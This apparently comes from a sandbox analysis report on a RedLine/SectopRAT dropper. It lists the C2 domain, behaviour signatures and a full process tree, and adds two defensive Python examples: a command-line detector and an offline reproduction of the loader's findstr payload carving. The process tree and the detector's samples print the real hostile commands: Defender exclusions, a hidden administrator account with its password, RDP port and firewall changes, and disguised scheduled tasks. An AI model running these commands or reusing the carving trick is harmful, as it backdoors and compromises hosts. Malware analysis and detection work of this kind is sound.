Analysis

  • max time kernel
    119s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20241007-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    22-12-2024 04:17

General

  • Target

    04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe

  • Size

    4.1MB

  • MD5

    3a63a094bced4de6d6d60818b7bbb260

  • SHA1

    924449f5414bc9e4964ba9fec4bb92326befad87

  • SHA256

    04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29d

  • SHA512

    1430317f400623744133efcf09311fd66913bfed8c33bfd4bb6e7336c89d8cedbd234f0f9ddb9ac6e1f4fc0e7a5598f9ed521d784267f0ea106e70d5373376fa

  • SSDEEP

    98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo

Malware Config

Extracted

Family

redline

Botnet

ads6

C2

bhajhhsy6.fun:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Grants admin privileges 1 TTPs

    Uses net.exe to add an account to a privileged local group.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Runs commands through powershell.exe.

  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely as a geofence check.

  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers commonly read stored browser data, which can include saved credentials, cookies and session tokens.

  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 3 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
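
The signatures above are the sandbox's own verdicts. The same chain (Defender exclusions, a new hidden local administrator placed in "Remote Desktop Users", the RDP listener moved to a new port with a matching inbound firewall rule, RDP Wrapper installed, a scheduled task created from an XML file named like a DLL) can be flagged from host telemetry. The following is an added example, not part of this report and not any vendor's ruleset: it runs a small set of command-line rules over process-creation events (Sysmon event 1 or Security 4688 CommandLine fields) and only raises a chain verdict when several independent stages are present. The sample events are copied from the process tree in the Processes section of this report; the rule names, the stage grouping and the three-stage threshold are this example's own choices.

```python
"""Flag the hidden-admin / RDP-backdoor chain in Windows process-creation
command lines.  Added example, not part of the sandbox report: SAMPLE_EVENTS
are copied from the report's process tree, everything else (rule names,
stage grouping, the 'three stages = chain' threshold) is this example's own."""
import re
from typing import Callable, Dict, List, Tuple


def _rx(pattern: str) -> Callable[[str], bool]:
    """Build a case-insensitive 'command line matches' predicate."""
    compiled = re.compile(pattern, re.I)
    return lambda cl: compiled.search(cl) is not None


def _schtasks_xml_not_xml(cl: str) -> bool:
    """schtasks /Create /XML fed from a file whose extension is not .xml
    (the sample reads its task definition from a file called bSR.dll)."""
    m = re.search(r'schtasks(?:\.exe)?\s+/create\b.*?/xml\s+"?([^"\s]+)"?', cl, re.I)
    return bool(m) and not m.group(1).lower().endswith(".xml")


# rule name -> (stage the rule belongs to, predicate over the command line)
RULES: Dict[str, Tuple[str, Callable[[str], bool]]] = {
    "defender_exclusion_added": ("defense_evasion",
        _rx(r'add-mppreference\s+-exclusion(?:path|process|extension|ipaddress)')),
    "defender_sample_submission_off": ("defense_evasion",
        _rx(r'set-mppreference\s+-submitsamplesconsent\s+neversend')),
    "local_user_created": ("account_manipulation",
        _rx(r'\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b')),
    "user_added_to_administrators": ("account_manipulation",
        _rx(r'\bnet1?(?:\.exe)?\s+localgroup\s+"?administrators"?\s+\S+\s+/add\b')),
    "user_added_to_rdp_users": ("account_manipulation",
        _rx(r'\bnet1?(?:\.exe)?\s+localgroup\s+"remote desktop users"\s+\S+\s+/add\b')),
    "password_expiry_disabled": ("account_manipulation",
        _rx(r'\bnet1?(?:\.exe)?\s+accounts\s+/maxpwage:unlimited\b')),
    "user_hidden_from_logon": ("account_manipulation",
        _rx(r'specialaccounts\\userlist.*/d\s+"?0+"?(?:\s|$)')),
    "rdp_listener_port_changed": ("rdp_exposure",
        _rx(r'winstations\\rdp-tcp.*?/v\s+"?portnumber"?')),
    "firewall_inbound_allow_added": ("rdp_exposure",
        _rx(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b(?=.*\bdir=in\b)(?=.*\baction=allow\b)')),
    "rdp_wrapper_installed": ("rdp_exposure",
        _rx(r'rdpwinst(?:\.exe)?"?\s+-i\b')),
    "schtasks_xml_from_non_xml_file": ("persistence", _schtasks_xml_not_xml),
}


def scan(events: List[str]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every rule that fires."""
    return [(name, cl) for cl in events
            for name, (_stage, pred) in RULES.items() if pred(cl)]


def assess(events: List[str], min_stages: int = 3) -> dict:
    """Correlate single hits into a verdict.  One Defender exclusion or one
    firewall rule on its own is routine admin work; the chain is reported
    only when at least `min_stages` distinct stages are present."""
    hits = scan(events)
    stages = sorted({RULES[name][0] for name, _ in hits})
    return {"hits": hits, "stages": stages,
            "rdp_backdoor_chain": len(stages) >= min_stages}


# Command lines copied from the report's process tree (malicious chain).
SAMPLE_EVENTS = [
    r'powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"',
    r'powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"',
    r'powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend',
    r'net user BsuIsYeBFe XSDwEoxCiw /add',
    r'net localgroup Administrators BsuIsYeBFe /add',
    r'net localgroup "Remote Desktop Users" BsuIsYeBFe /add',
    r'net accounts /maxpwage:unlimited',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v BsuIsYeBFe /t REG_DWORD /d "00000000" /f',
    r'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f',
    r'netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389',
    r'schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "GoogleUpdateTaskMachineUA89"',
    r'"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o',
]

# Also from the tree, but discovery/cleanup commands no rule should fire on.
BENIGN_EVENTS = [
    r'sc queryex "TermService"',
    r'fsutil dirty query C:',
    r'wmic group where sid="S-1-5-32-544" get name /value',
    r'netsh advfirewall firewall delete rule name="Remote Desktop"',
    r'"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u',
]

if __name__ == "__main__":
    verdict = assess(SAMPLE_EVENTS + BENIGN_EVENTS)
    for name, cl in verdict["hits"]:
        print(f"{name:32} {cl}")
    print("stages:", verdict["stages"], "chain:", verdict["rdp_backdoor_chain"])
```

The correlation step is what keeps this usable in a real environment: a lone `Add-MpPreference` or `netsh ... add rule` is common in admin scripts, but Defender tampering plus a new hidden local administrator plus a moved RDP listener on one host inside one process tree is not.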

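The process tree below shows the loader running `findstr /V /R "^<marker>$" Mio.xltx` three times before Potere.exe.com, Riscalda.exe.com and Desideri.exe.com are executed from AppData\Roaming. `findstr /V` prints every line that does not match, so a carrier file built as "one marker line plus the raw payload" is turned back into the payload without any decoding. The tree does not show where findstr's output is redirected; that it is written to the .exe.com files is an assumption of this added example, which is not part of the report. It reproduces the carving step offline on a constructed carrier (a fake MZ stub, not the real Mio.xltx) so the dropped stage can be recovered from the original sample without executing anything; the marker string is the one copied from the tree.

```python
"""Offline reproduction of the stager's `findstr /V /R "^marker$"` carving.
Added example, not part of the sandbox report.  MARKER is copied from the
process tree; the carrier below is constructed, not the real Mio.xltx, and
the assumption that findstr's output becomes the .exe.com file is ours."""

# Exact marker line the sample filters out (copied from the process tree).
MARKER = (b"eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHq"
          b"vAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp")


def findstr_v_exact(data: bytes, marker: bytes) -> bytes:
    """Emulate `findstr /V /R "^marker$"` on a binary file: split on LF,
    drop every line whose content (ignoring a trailing CR) equals the
    marker, and write the remaining lines back unchanged.  Binary payload
    bytes survive because lines are never altered, only dropped."""
    kept = []
    for line in data.split(b"\n"):
        body = line[:-1] if line.endswith(b"\r") else line
        if body != marker:
            kept.append(line)
    return b"\n".join(kept)


def carve(carrier: bytes, marker: bytes) -> dict:
    """Apply the filter and report whether what is left looks like a PE."""
    payload = findstr_v_exact(carrier, marker)
    return {
        "payload": payload,
        "is_pe": payload.startswith(b"MZ"),
        "bytes_removed": len(carrier) - len(payload),
    }


def double_extension(name: str) -> bool:
    """True for names like Potere.exe.com: a second, executable extension
    hiding behind a first one.  Hypothetical helper for triage listings."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] in {"com", "exe", "scr", "pif"}


# Constructed carrier: a fake MZ stub whose body contains every byte value
# (so LF and CR occur inside the 'payload'), prefixed by the marker line.
FAKE_PAYLOAD = b"MZ\x90\x00" + bytes(range(256)) * 4 + b"\n"
FAKE_CARRIER = MARKER + b"\r\n" + FAKE_PAYLOAD

if __name__ == "__main__":
    result = carve(FAKE_CARRIER, MARKER)
    print("PE header:", result["is_pe"], "removed:", result["bytes_removed"], "bytes")
    print("Potere.exe.com masquerades:", double_extension("Potere.exe.com"))
```

To apply this to the real sample, extract Mio.xltx from the archive the first stage unpacks and pass its bytes to `carve()` with the marker from the command line; the result should begin with `MZ` and can be handed to a PE parser or hashed against the dropped files. Byte-for-byte equality with findstr's own output holds as long as no payload line happens to equal the marker, which is what the loader relies on too.
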
Processes

  • C:\Users\Admin\AppData\Local\Temp\04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe
    "C:\Users\Admin\AppData\Local\Temp\04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SysWOW64\makecab.exe
      "C:\Windows\System32\makecab.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4056
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
            PID:2044
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
            Potere.exe.com A
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1080
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
                C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
                6⤵
                • Executes dropped EXE
                • Drops Chrome extension
                • Suspicious behavior: EnumeratesProcesses
                PID:848
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4760
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
            Riscalda.exe.com Z
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1528
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4556
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3876
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
            Desideri.exe.com G
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3564
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3172
              • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4336
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3488
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2008
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5036
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2096
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2904
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4744
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:3736
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1716
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\1167.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs
                  7⤵
                    PID:4524
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\1167.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:3404
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\25.vbs" BsuIsYeBFe XSDwEoxCiw "C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:1660
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\25.vbs" BsuIsYeBFe XSDwEoxCiw "C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                      8⤵
                        PID:3284
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "GoogleUpdateTaskMachineUA89"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:544
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "GoogleUpdateTaskMachineUA89"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:436
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\329.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                      7⤵
                        PID:1876
                        • C:\Windows\SysWOW64\cscript.exe
                          cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\329.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:5040
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "Adobe Flash Player Updater16"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:3876
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "Adobe Flash Player Updater16"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1080
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\UFsvtvN\pNvTxatFeC.bat BsuIsYeBFe XSDwEoxCiw"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:3964
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4636
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic group where sid="S-1-5-32-544" get name /value
                            9⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3544
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:1528
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic group where sid="S-1-5-32-555" get name /value
                            9⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2828
                        • C:\Windows\SysWOW64\net.exe
                          net user BsuIsYeBFe XSDwEoxCiw /add
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2808
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 user BsuIsYeBFe XSDwEoxCiw /add
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:1740
                        • C:\Windows\SysWOW64\net.exe
                          net localgroup Administrators BsuIsYeBFe /add
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:404
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 localgroup Administrators BsuIsYeBFe /add
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:4544
                        • C:\Windows\SysWOW64\net.exe
                          net localgroup "Remote Desktop Users" BsuIsYeBFe /add
                          8⤵
                          • Remote Service Session Hijacking: RDP Hijacking
                          PID:4916
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 localgroup "Remote Desktop Users" BsuIsYeBFe /add
                            9⤵
                            • Remote Service Session Hijacking: RDP Hijacking
                            • System Location Discovery: System Language Discovery
                            PID:5060
                        • C:\Windows\SysWOW64\net.exe
                          net accounts /maxpwage:unlimited
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2920
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 accounts /maxpwage:unlimited
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:2276
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v BsuIsYeBFe /t REG_DWORD /d "00000000" /f
                          8⤵
                          • Hide Artifacts: Hidden Users
                          • System Location Discovery: System Language Discovery
                          PID:4904
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4884
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                          8⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4532
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2036
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4948
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3088
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4848
                        • C:\Windows\SysWOW64\timeout.exe
                          Timeout /t 15
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Delays execution with timeout.exe
                          PID:5112
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
                        7⤵
                        • Drops file in Program Files directory
                        PID:3012
                        • C:\Windows\SysWOW64\fsutil.exe
                          fsutil dirty query C:
                          8⤵
                            PID:5020
                          • C:\Windows\SysWOW64\sc.exe
                            sc queryex "TermService"
                            8⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3672
                          • C:\Windows\SysWOW64\find.exe
                            find "STATE"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:3652
                          • C:\Windows\SysWOW64\find.exe
                            find /v "RUNNING"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1876
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                            8⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3476
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • Modifies WinLogon
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            PID:2608
                            • C:\Windows\SYSTEM32\netsh.exe
                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
